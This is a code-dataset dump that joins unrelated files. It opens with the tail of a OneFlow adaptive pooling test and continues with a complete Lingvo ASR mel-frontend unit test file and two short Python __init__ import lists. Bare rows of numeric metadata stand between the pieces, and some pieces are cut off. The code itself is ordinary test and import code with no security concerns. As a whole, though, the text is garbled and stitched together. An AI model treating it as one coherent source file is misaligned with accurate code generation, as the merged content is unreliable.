1.89049181058751703,
],
[
-0.55938618990646538,
-0.49495202415265188,
-0.18536721363519787,
-0.60989698667757719,
],
[
-1.65362152601718160,
-1.03925835404367861,
0.36867765976139671,
-0.53568828349518050,
],
],
[
[
-1.26179006644499525,
-1.43909210916315322,
0.20654399652431357,
0.81864721019067133,
],
[
-0.30333788634000142,
-0.81732697640762930,
-0.37675150976256139,
-0.11021655039337777,
],
[
-0.22977043608192885,
1.27171963666499055,
-0.47908512978782908,
-1.44953694047278558,
],
[
-1.28020932869777826,
-0.11184514806663474,
1.70221670872109843,
-1.73548372877253554,
],
],
[
[
2.47064979917736061,
-0.65497026319732976,
-0.93181070795716758,
1.46529042716824276,
],
[
1.14198642343413970,
1.38990908108600797,
0.96578419005255678,
-0.85631142649766190,
],
[
0.19515087084250754,
-0.37808457398571094,
0.29386253984961830,
0.92799305103533269,
],
[
-0.93741182779940069,
0.33418317304524309,
-0.27925427653038332,
0.38029090707066726,
],
],
[
[
0.59186866597360410,
-0.78706310899389020,
-0.95343448742453918,
0.31341612954718795,
],
[
0.75090294441452277,
-0.92992883985623231,
-0.73430540527824761,
-0.88064815906966942,
],
[
-0.47078530163539850,
0.12253641652645629,
0.50880220398328457,
0.52039178932756203,
],
[
-0.08613006511636320,
0.30291348404866386,
-0.62685658736801231,
-0.27469204305759976,
],
],
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
)
m = flow.nn.AdaptiveAvgPool3d((1, 2, 3))
m.to(device)
of_out = m(input)
np_out = np.array(
[
[
[
[0.08871791260375947, -0.40249593765093078, 0.00722249259371315],
[-0.31343444964845824, 0.08188803218941582, -0.09210164562800888],
]
]
]
)
test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 1e-5, 1e-5))
def _test_adaptive_avgpool3d_dhw_backward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
[
[
-1.07757179960088489,
-0.78045388903658375,
-1.26275387521194427,
0.99935071451204771,
],
[
2.02225324891575164,
1.10345137769946500,
-0.43773247548795780,
1.89049181058751703,
],
[
-0.55938618990646538,
-0.49495202415265188,
-0.18536721363519787,
-0.60989698667757719,
],
[
-1.65362152601718160,
-1.03925835404367861,
0.36867765976139671,
-0.53568828349518050,
],
],
[
[
-1.26179006644499525,
-1.43909210916315322,
0.20654399652431357,
0.81864721019067133,
],
[
-0.30333788634000142,
-0.81732697640762930,
-0.37675150976256139,
-0.11021655039337777,
],
[
-0.22977043608192885,
1.27171963666499055,
-0.47908512978782908,
-1.44953694047278558,
],
[
-1.28020932869777826,
-0.11184514806663474,
1.70221670872109843,
-1.73548372877253554,
],
],
[
[
2.47064979917736061,
-0.65497026319732976,
-0.93181070795716758,
1.46529042716824276,
],
[
1.14198642343413970,
1.38990908108600797,
0.96578419005255678,
-0.85631142649766190,
],
[
0.19515087084250754,
-0.37808457398571094,
0.29386253984961830,
0.92799305103533269,
],
[
-0.93741182779940069,
0.33418317304524309,
-0.27925427653038332,
0.38029090707066726,
],
],
[
[
0.59186866597360410,
-0.78706310899389020,
-0.95343448742453918,
0.31341612954718795,
],
[
0.75090294441452277,
-0.92992883985623231,
-0.73430540527824761,
-0.88064815906966942,
],
[
-0.47078530163539850,
0.12253641652645629,
0.50880220398328457,
0.52039178932756203,
],
[
-0.08613006511636320,
0.30291348404866386,
-0.62685658736801231,
-0.27469204305759976,
],
],
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
requires_grad=True,
)
m = flow.nn.AdaptiveAvgPool3d((1, 2, 3))
of_out = m(input)
of_out = of_out.sum()
of_out.backward()
np_grad = np.array(
[
[
[
[
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
],
[
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
],
[
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
],
[
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
[0.0625, 0.125, 0.125, 0.0625],
],
]
]
]
)
test_case.assertTrue(np.allclose(input.grad.numpy(), np_grad, 1e-5, 1e-5))
@flow.unittest.skip_unless_1n1d()
class TestAdaptiveAvgPool(flow.unittest.TestCase):
def test_adaptive_avgpool1d(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [
_test_adaptive_avgpool1d_forward,
_test_adaptive_avgpool1d_backward,
]
arg_dict["device"] = [
"cpu",
"cuda",
]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
def test_adaptive_avgpool2d(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [
_test_adaptive_avgpool2d_forward,
_test_adaptive_avgpool2d_backward,
_test_adaptive_avgpool2d_hw_forward,
_test_adaptive_avgpool2d_hw_backward,
]
arg_dict["device"] = [
"cpu",
"cuda",
]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
def test_adaptive_avgpool3d(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [
_test_adaptive_avgpool3d_forward,
_test_adaptive_avgpool3d_backward,
_test_adaptive_avgpool3d_dhw_forward,
_test_adaptive_avgpool3d_dhw_backward,
]
arg_dict["device"] = [
"cpu",
"cuda",
]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
if __name__ == "__main__":
unittest.main()
| 36.953897
| 88
| 0.332541
| 1,933
| 33,665
| 5.670978
| 0.133471
| 0.03503
| 0.043332
| 0.057654
| 0.881682
| 0.859788
| 0.85322
| 0.849754
| 0.849754
| 0.84802
| 0
| 0.517
| 0.59201
| 33,665
| 910
| 89
| 36.994505
| 0.281107
| 0.017763
| 0
| 0.671694
| 0
| 0
| 0.003176
| 0
| 0
| 0
| 0
| 0.001099
| 0.015081
| 1
| 0.015081
| false
| 0
| 0.0058
| 0
| 0.022042
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6b1f5a1501e6b73fa452fad3f10b97e8bd819a92
| 109
|
py
|
Python
|
hermes-message/models/__init__.py
|
popsolutions/hermes-message
|
cbe51b443656908255e142e2dd2a524d63222279
|
[
"MIT"
] | null | null | null |
hermes-message/models/__init__.py
|
popsolutions/hermes-message
|
cbe51b443656908255e142e2dd2a524d63222279
|
[
"MIT"
] | 5
|
2021-08-05T14:05:43.000Z
|
2021-11-05T22:07:56.000Z
|
hermes-message/models/__init__.py
|
popsolutions/hermes-message
|
cbe51b443656908255e142e2dd2a524d63222279
|
[
"MIT"
] | 1
|
2022-02-15T04:11:14.000Z
|
2022-02-15T04:11:14.000Z
|
from . import mail_message
from . import hermes_monitor
from . import hermes_apps
from . import hermes_token
| 21.8
| 28
| 0.816514
| 16
| 109
| 5.3125
| 0.5
| 0.470588
| 0.564706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146789
| 109
| 4
| 29
| 27.25
| 0.913978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8621c0ab64ba809a77aded2f306fc6c98e76c765
| 20,159
|
py
|
Python
|
lingvo/tasks/asr/frontend_test.py
|
allenwang28/lingvo
|
26d3d6672d3f46d8f281c2aa9f57166ef6296738
|
[
"Apache-2.0"
] | 2,611
|
2018-10-16T20:14:10.000Z
|
2022-03-31T14:48:41.000Z
|
lingvo/tasks/asr/frontend_test.py
|
allenwang28/lingvo
|
26d3d6672d3f46d8f281c2aa9f57166ef6296738
|
[
"Apache-2.0"
] | 249
|
2018-10-27T06:02:29.000Z
|
2022-03-30T18:00:39.000Z
|
lingvo/tasks/asr/frontend_test.py
|
allenwang28/lingvo
|
26d3d6672d3f46d8f281c2aa9f57166ef6296738
|
[
"Apache-2.0"
] | 436
|
2018-10-25T05:31:45.000Z
|
2022-03-31T07:26:03.000Z
|
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for asr frontend."""
import lingvo.compat as tf
from lingvo.core import py_utils
from lingvo.core import test_helper
from lingvo.core import test_utils
from lingvo.tasks.asr import frontend
import numpy as np
class AsrFrontendTest(test_utils.TestCase):
def _GetPcm(self):
"""Gets sample wav file pcm samples.
Returns:
(sample_rate, mono_audio) where mono_audio is of shape
[batch (=1), samples].
"""
with open(
test_helper.test_src_dir_path('tools/testdata/gan_or_vae.wav'),
'rb') as f:
wavdata = f.read()
result = tf.audio.decode_wav(wavdata)
# Remove the last dimension: channel is 1.
audio = py_utils.HasShape(result.audio, [75900, 1])
audio = tf.squeeze(audio, axis=1)
# Returns audio as batch-major data with a single batch.
return result.sample_rate, tf.expand_dims(audio, axis=0)
def _CreateFrontendParams(self):
p = frontend.MelAsrFrontend.Params()
p.sample_rate = 24000.
p.num_bins = 2
p.noise_scale = 0.
return p
def testNullAsrFrontendConfig(self):
p = frontend.NullAsrFrontend.Params()
p.name = 'null'
fe = p.Instantiate()
config = fe.config
self.assertTrue(config.is_null)
self.assertEqual(config.src_type, 'none')
self.assertEqual(config.output_dim, -1)
self.assertEqual(config.input_frame_ratio, 1.0)
def testMelFeaturesUnstackedConfig(self):
p = self._CreateFrontendParams()
fe = p.Instantiate()
config = fe.config
self.assertFalse(config.is_null)
self.assertEqual(config.src_type, 'pcm')
self.assertEqual(config.src_pcm_scale, 32768.0)
self.assertEqual(config.src_pcm_sample_rate, 16000.0)
self.assertEqual(config.output_dim, 2)
# Approx 34 output frames per second.
self.assertEqual(config.input_frame_ratio, 480.0)
def testMelFeaturesLeftStackedConfig(self):
p = self._CreateFrontendParams()
p.stack_left_context = 2
p.frame_stride = p.stack_left_context + 1
fe = p.Instantiate()
config = fe.config
self.assertFalse(config.is_null)
self.assertEqual(config.src_type, 'pcm')
self.assertEqual(config.src_pcm_scale, 32768.0)
self.assertEqual(config.src_pcm_sample_rate, 16000.0)
self.assertEqual(config.output_dim, 6)
# Approx 12 output frames per second.
self.assertEqual(config.input_frame_ratio, 1440.0)
def testMelFeaturesLeftRightStackedConfig(self):
p = self._CreateFrontendParams()
p.stack_right_context = 2
p.stack_left_context = 2
p.frame_stride = p.stack_right_context + p.stack_left_context + 1
fe = p.Instantiate()
config = fe.config
# Approx 6 output frames per second.
self.assertEqual(config.input_frame_ratio, 2400.0)
def testMelFeaturesUnstacked(self):
p = self._CreateFrontendParams()
mel_frontend = p.Instantiate()
sample_rate, pcm = self._GetPcm()
pcm *= 32768
# Convert to 4D [batch, time, packet, channels].
sample_count = tf.shape(pcm)[1]
packet_size = 11 # A non-round number.
trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
paddings = tf.zeros(tf.shape(src_inputs)[0:2])
outputs = mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
log_mel = outputs.src_inputs
paddings = outputs.paddings
with self.session():
pcm = self.evaluate(pcm)
tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
self.assertGreater(33000, np.amax(pcm))
self.assertGreater(np.amax(pcm), 2.)
log_mel, paddings, sample_rate = self.evaluate(
[log_mel, paddings, sample_rate])
self.assertEqual(sample_rate, p.sample_rate)
self.assertEqual(paddings.shape, log_mel.shape[0:2])
self.assertAllEqual(paddings, np.zeros_like(paddings))
# log_mel ~ [batch, time, feature_size, channel]
tf.logging.info('mel ~ %s', log_mel.shape)
self.assertEqual(log_mel.shape[2], 2) # 2 bins
# Squeeze the batch and channel dimensions out.
log_mel = np.squeeze(log_mel, axis=(0, 3))
t = log_mel.shape[0]
mu = np.sum(log_mel, axis=0) / t
d = log_mel - mu
v = np.sum(d * d, axis=0) / (t - 1)
s = np.sqrt(v)
tf.logging.info('Found mean = %s', mu)
tf.logging.info('Found stddev = %s', s)
ref_unstacked_mean = [13.46184731, 13.30099297]
ref_unstacked_stddev = [1.3840059, 1.24434352]
self.assertAllClose(mu, ref_unstacked_mean, atol=1e-4)
self.assertAllClose(s, ref_unstacked_stddev, atol=1e-3)
def testMelFeaturesNotEmphasized(self):
p = self._CreateFrontendParams()
mel_frontend = p.Instantiate()
not_emphasized_p = p.Copy()
not_emphasized_p.preemph = 0.
not_emphasized_mel_frontend = not_emphasized_p.Instantiate()
_, pcm = self._GetPcm()
pcm *= 32768
# Convert to 4D [batch, time, packet, channels].
sample_count = tf.shape(pcm)[1]
packet_size = 11 # A non-round number.
trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
paddings = tf.zeros(tf.shape(src_inputs)[0:2])
outputs = mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
not_emphasized_outputs = not_emphasized_mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
log_mel = outputs.src_inputs
not_emphasized_log_mel = not_emphasized_outputs.src_inputs
with self.session():
log_mel, not_emphasized_log_mel = self.evaluate(
[log_mel, not_emphasized_log_mel])
self.assertEqual(log_mel.shape, not_emphasized_log_mel.shape)
def testMelFeaturesLeftStacked(self):
p = self._CreateFrontendParams()
p.stack_left_context = 2
p.frame_stride = p.stack_left_context + 1
mel_frontend = p.Instantiate()
sample_rate, pcm = self._GetPcm()
pcm *= 32768
# Convert to 4D [batch, time, packet, channels].
sample_count = tf.shape(pcm)[1]
packet_size = 11 # A non-round number.
trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
paddings = tf.zeros(tf.shape(src_inputs)[0:2])
outputs = mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
log_mel = outputs.src_inputs
paddings = outputs.paddings
with self.session():
pcm = self.evaluate(pcm)
tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
self.assertGreater(33000, np.amax(pcm))
self.assertGreater(np.amax(pcm), 2.)
log_mel, paddings, sample_rate = self.evaluate(
[log_mel, paddings, sample_rate])
self.assertEqual(sample_rate, p.sample_rate)
self.assertEqual(paddings.shape, log_mel.shape[0:2])
self.assertAllEqual(paddings, np.zeros_like(paddings))
# log_mel ~ [batch, time, feature_size, channel]
tf.logging.info('mel ~ %s', log_mel.shape)
# Squeeze the batch and channel dimensions out.
log_mel = np.squeeze(log_mel, axis=(0, 3))
t = log_mel.shape[0]
mu = np.sum(log_mel, axis=0) / t
d = log_mel - mu
v = np.sum(d * d, axis=0) / (t - 1)
s = np.sqrt(v)
tf.logging.info('Found mean = %s', mu)
tf.logging.info('Found stddev = %s', s)
ref_mean = (13.38236332, 13.2698698, 13.45229626, 13.26469517,
13.46731281, 13.31649303)
ref_stddev = (1.52104115, 1.27433181, 1.41266346, 1.27072334, 1.41251481,
1.28583682)
self.assertAllClose(mu, ref_mean, atol=1e-4)
self.assertAllClose(s, ref_stddev, atol=1e-3)
def testMelFeaturesRightStacked(self):
p = self._CreateFrontendParams()
p.stack_right_context = 2
p.frame_stride = p.stack_right_context + 1
mel_frontend = p.Instantiate()
sample_rate, pcm = self._GetPcm()
pcm *= 32768
# Convert to 4D [batch, time, packet, channels].
sample_count = tf.shape(pcm)[1]
packet_size = 11 # A non-round number.
trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
paddings = tf.zeros(tf.shape(src_inputs)[0:2])
outputs = mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
log_mel = outputs.src_inputs
paddings = outputs.paddings
with self.session():
pcm = self.evaluate(pcm)
tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
self.assertGreater(33000, np.amax(pcm))
self.assertGreater(np.amax(pcm), 2.)
log_mel, paddings, sample_rate = self.evaluate(
[log_mel, paddings, sample_rate])
self.assertEqual(sample_rate, p.sample_rate)
self.assertEqual(paddings.shape, log_mel.shape[0:2])
self.assertAllEqual(paddings, np.zeros_like(paddings))
# log_mel ~ [batch, time, feature_size, channel]
tf.logging.info('mel ~ %s', log_mel.shape)
# Squeeze the batch and channel dimensions out.
log_mel = np.squeeze(log_mel, axis=(0, 3))
t = log_mel.shape[0]
mu = np.sum(log_mel, axis=0) / t
d = log_mel - mu
v = np.sum(d * d, axis=0) / (t - 1)
s = np.sqrt(v)
tf.logging.info('Found mean = %s', mu)
tf.logging.info('Found stddev = %s', s)
ref_mean = (13.46731281, 13.31649303, 13.41263676, 13.28540039,
13.48256969, 13.2802248)
ref_stddev = (1.41251481, 1.28583682, 1.43964291, 1.23710775, 1.32300735,
1.23345602)
self.assertAllClose(mu, ref_mean, atol=1e-4)
self.assertAllClose(s, ref_stddev, atol=1e-3)
def testMelFeaturesPaddedLeftStacked(self):
p = self._CreateFrontendParams()
p.stack_left_context = 2
p.frame_stride = p.stack_left_context + 1
mel_frontend = p.Instantiate()
sample_rate, pcm = self._GetPcm()
pcm *= 32768
# Convert to 4D [batch, time, packet, channels].
sample_count = tf.shape(pcm)[1]
packet_size = 11 # A non-round number.
trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
# Create paddings such that the first 455 packets are unpadded.
paddings = tf.concat([
tf.zeros([1, 455], dtype=tf.float32),
tf.ones([1, tf.shape(src_inputs)[1] - 455], dtype=tf.float32)
],
axis=1)
# frame_step=240, frame_size=601, +1202 left padded frames
# 455 packets * 11 frames rounds = 5005 frames, rounds down to 21 mel
# frames. Divide by 3 for stacking = 7.
expected_unpadded = 7
outputs = mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
log_mel = outputs.src_inputs
paddings = outputs.paddings
with self.session():
pcm = self.evaluate(pcm)
tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
self.assertGreater(33000, np.amax(pcm))
self.assertGreater(np.amax(pcm), 2.)
log_mel, paddings, sample_rate = self.evaluate(
[log_mel, paddings, sample_rate])
self.assertEqual(sample_rate, p.sample_rate)
self.assertEqual(paddings.shape, log_mel.shape[0:2])
self.assertAllEqual(paddings[:, 0:expected_unpadded],
np.zeros([1, expected_unpadded]))
self.assertAllEqual(paddings[:, expected_unpadded:],
np.ones([1, paddings.shape[1] - expected_unpadded]))
# log_mel ~ [batch, time, feature_size, channel]
tf.logging.info('mel ~ %s', log_mel.shape)
# Squeeze the batch and channel dimensions out.
log_mel = np.squeeze(log_mel, axis=(0, 3))
t = log_mel.shape[0]
mu = np.sum(log_mel, axis=0) / t
d = log_mel - mu
v = np.sum(d * d, axis=0) / (t - 1)
s = np.sqrt(v)
tf.logging.info('Found mean = %s', mu)
tf.logging.info('Found stddev = %s', s)
ref_mean = (13.38236332, 13.2698698, 13.45229626, 13.26469517,
13.46731281, 13.31649303)
ref_stddev = (1.52104115, 1.27433181, 1.41266346, 1.27072334, 1.41251481,
1.28583682)
self.assertAllClose(mu, ref_mean, atol=1e-4)
self.assertAllClose(s, ref_stddev, atol=1e-3)
def testMelFeaturesPaddedRightStacked(self):
p = self._CreateFrontendParams()
p.stack_right_context = 2
p.frame_stride = p.stack_right_context + 1
mel_frontend = p.Instantiate()
sample_rate, pcm = self._GetPcm()
pcm *= 32768
# Convert to 4D [batch, time, packet, channels].
sample_count = tf.shape(pcm)[1]
packet_size = 11 # A non-round number.
trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
# Create paddings such that the first 455 packets are unpadded.
paddings = tf.concat([
tf.zeros([1, 455], dtype=tf.float32),
tf.ones([1, tf.shape(src_inputs)[1] - 455], dtype=tf.float32)
],
axis=1)
# frame_step=240, frame_size=600, +1200 right padded frames
# 455 packets * 11 frames rounds = 5005 frames, rounds down to 21 mel
# frames. Divide by 3 for stacking = 7.
# TODO(talremez): Make sure with this makes sense.
expected_unpadded = 6
outputs = mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
log_mel = outputs.src_inputs
paddings = outputs.paddings
with self.session():
pcm = self.evaluate(pcm)
tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
self.assertGreater(33000, np.amax(pcm))
self.assertGreater(np.amax(pcm), 2.)
log_mel, paddings, sample_rate = self.evaluate(
[log_mel, paddings, sample_rate])
self.assertEqual(sample_rate, p.sample_rate)
self.assertEqual(paddings.shape, log_mel.shape[0:2])
self.assertAllEqual(paddings[:, 0:expected_unpadded],
np.zeros([1, expected_unpadded]))
self.assertAllEqual(paddings[:, expected_unpadded:],
np.ones([1, paddings.shape[1] - expected_unpadded]))
def testMelMeanVarNormalization(self):
p = self._CreateFrontendParams()
p.stack_left_context = 2
p.frame_stride = p.stack_left_context + 1
ref_mean = (13.38236332, 13.2698698, 13.45229626, 13.26469517, 13.46731281,
13.31649303)
ref_stddev = (1.52104115, 1.27433181, 1.41266346, 1.27072334, 1.41251481,
1.28583682)
p.per_bin_mean = ref_mean[:p.num_bins]
p.per_bin_stddev = ref_stddev[:p.num_bins]
mel_frontend = p.Instantiate()
_, pcm = self._GetPcm()
pcm *= 32768
# Convert to 4D [batch, time, packet, channels].
sample_count = tf.shape(pcm)[1]
packet_size = 11 # A non-round number.
trimmed_pcm = pcm[:, 0:(sample_count // packet_size) * packet_size]
src_inputs = tf.reshape(trimmed_pcm, (1, -1, packet_size, 1))
paddings = tf.zeros(tf.shape(src_inputs)[0:2])
outputs = mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
log_mel = outputs.src_inputs
with self.session():
log_mel = self.evaluate(log_mel)
# log_mel ~ [batch, time, feature_size, channel]
tf.logging.info('mel ~ %s', log_mel.shape)
# Squeeze the batch and channel dimensions out.
log_mel = np.squeeze(log_mel, axis=(0, 3))
t = log_mel.shape[0]
mu = np.sum(log_mel, axis=0) / t
d = log_mel - mu
v = np.sum(d * d, axis=0) / (t - 1)
s = np.sqrt(v)
# Only take the base bin values:
mu = mu[:p.num_bins]
s = s[:p.num_bins]
self.assertAllClose(mu, np.zeros_like(mu), atol=1e-4)
self.assertAllClose(s, np.ones_like(s), atol=1e-3)
def testMelFeaturesUnstacked2D(self):
# TODO(laurenzo): Remove this test once 2D inputs support removed.
p = self._CreateFrontendParams()
mel_frontend = p.Instantiate()
sample_rate, pcm = self._GetPcm()
pcm *= 32768
# Leave in 2D [batch, time].
src_inputs = pcm
paddings = tf.zeros(tf.shape(src_inputs)[0:2])
outputs = mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
log_mel = outputs.src_inputs
paddings = outputs.paddings
with self.session():
pcm = self.evaluate(pcm)
tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
self.assertGreater(33000, np.amax(pcm))
self.assertGreater(np.amax(pcm), 2.)
log_mel, paddings, sample_rate = self.evaluate(
[log_mel, paddings, sample_rate])
self.assertEqual(sample_rate, p.sample_rate)
self.assertEqual(paddings.shape, log_mel.shape[0:2])
self.assertAllEqual(paddings, np.zeros_like(paddings))
# log_mel ~ [batch, time, feature_size, channel]
tf.logging.info('mel ~ %s', log_mel.shape)
self.assertEqual(log_mel.shape[2], 2) # 2 bins
# Squeeze the batch and channel dimensions out.
log_mel = np.squeeze(log_mel, axis=(0, 3))
t = log_mel.shape[0]
mu = np.sum(log_mel, axis=0) / t
d = log_mel - mu
v = np.sum(d * d, axis=0) / (t - 1)
s = np.sqrt(v)
tf.logging.info('Found mean = %s', mu)
tf.logging.info('Found stddev = %s', s)
ref_unstacked_mean = [13.46184731, 13.30099297]
ref_unstacked_stddev = [1.3840059, 1.24434352]
self.assertAllClose(mu, ref_unstacked_mean, atol=1e-4)
self.assertAllClose(s, ref_unstacked_stddev, atol=1e-3)
def testMelFeaturesUnstacked3D(self):
# TODO(laurenzo): Remove this test once 3D inputs support removed.
p = self._CreateFrontendParams()
mel_frontend = p.Instantiate()
sample_rate, pcm = self._GetPcm()
pcm *= 32768
# Leave in 3D [batch, time, 1].
src_inputs = tf.expand_dims(pcm, axis=2)
paddings = tf.zeros(tf.shape(src_inputs)[0:2])
outputs = mel_frontend.FPropDefaultTheta(
py_utils.NestedMap(src_inputs=src_inputs, paddings=paddings))
log_mel = outputs.src_inputs
paddings = outputs.paddings
with self.session():
pcm = self.evaluate(pcm)
tf.logging.info('pcm: ~ %s = %s', pcm.shape, pcm)
self.assertGreater(33000, np.amax(pcm))
self.assertGreater(np.amax(pcm), 2.)
log_mel, paddings, sample_rate = self.evaluate(
[log_mel, paddings, sample_rate])
self.assertEqual(sample_rate, p.sample_rate)
self.assertEqual(paddings.shape, log_mel.shape[0:2])
self.assertAllEqual(paddings, np.zeros_like(paddings))
# log_mel ~ [batch, time, feature_size, channel]
tf.logging.info('mel ~ %s', log_mel.shape)
self.assertEqual(log_mel.shape[2], 2) # 2 bins
# Squeeze the batch and channel dimensions out.
log_mel = np.squeeze(log_mel, axis=(0, 3))
t = log_mel.shape[0]
mu = np.sum(log_mel, axis=0) / t
d = log_mel - mu
v = np.sum(d * d, axis=0) / (t - 1)
s = np.sqrt(v)
tf.logging.info('Found mean = %s', mu)
tf.logging.info('Found stddev = %s', s)
ref_unstacked_mean = [13.46184731, 13.30099297]
ref_unstacked_stddev = [1.3840059, 1.24434352]
self.assertAllClose(mu, ref_unstacked_mean, atol=1e-4)
self.assertAllClose(s, ref_unstacked_stddev, atol=1e-3)
if __name__ == '__main__':
tf.test.main()
| 40.47992
| 80
| 0.65782
| 2,810
| 20,159
| 4.54911
| 0.11032
| 0.042713
| 0.026441
| 0.021904
| 0.821169
| 0.813346
| 0.806462
| 0.794571
| 0.782524
| 0.781585
| 0
| 0.063194
| 0.214247
| 20,159
| 497
| 81
| 40.561368
| 0.743813
| 0.14336
| 0
| 0.811705
| 0
| 0
| 0.023229
| 0.001688
| 0
| 0
| 0
| 0.002012
| 0.183206
| 1
| 0.038168
| false
| 0
| 0.015267
| 0
| 0.061069
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86334799143a45c483afe6694da47d2113a27ee4
| 105
|
py
|
Python
|
examples/core/models/__init__.py
|
zyh1999/pytorch-quantum
|
c00bd564a99001fee2fd6b30e5e34562ab981e28
|
[
"MIT"
] | 98
|
2021-07-23T07:11:32.000Z
|
2021-12-19T14:04:58.000Z
|
examples/core/models/__init__.py
|
zyh1999/pytorch-quantum
|
c00bd564a99001fee2fd6b30e5e34562ab981e28
|
[
"MIT"
] | 2
|
2021-02-11T19:01:48.000Z
|
2021-04-04T20:29:57.000Z
|
examples/core/models/__init__.py
|
zyh1999/pytorch-quantum
|
c00bd564a99001fee2fd6b30e5e34562ab981e28
|
[
"MIT"
] | 12
|
2021-07-23T07:10:47.000Z
|
2021-12-16T23:44:44.000Z
|
from .t_models import *
from .c_models import *
from .q_models import *
from .layer_regression import *
| 17.5
| 31
| 0.761905
| 16
| 105
| 4.75
| 0.5
| 0.473684
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161905
| 105
| 5
| 32
| 21
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
865e40a82364d0eae787a897035f5905b9996aef
| 39,072
|
py
|
Python
|
strava/swagger_client/api/activities_api.py
|
neozenith/strava-gsheet-python
|
cce24721d6dcae69638c99261308f3d76512a087
|
[
"MIT"
] | null | null | null |
strava/swagger_client/api/activities_api.py
|
neozenith/strava-gsheet-python
|
cce24721d6dcae69638c99261308f3d76512a087
|
[
"MIT"
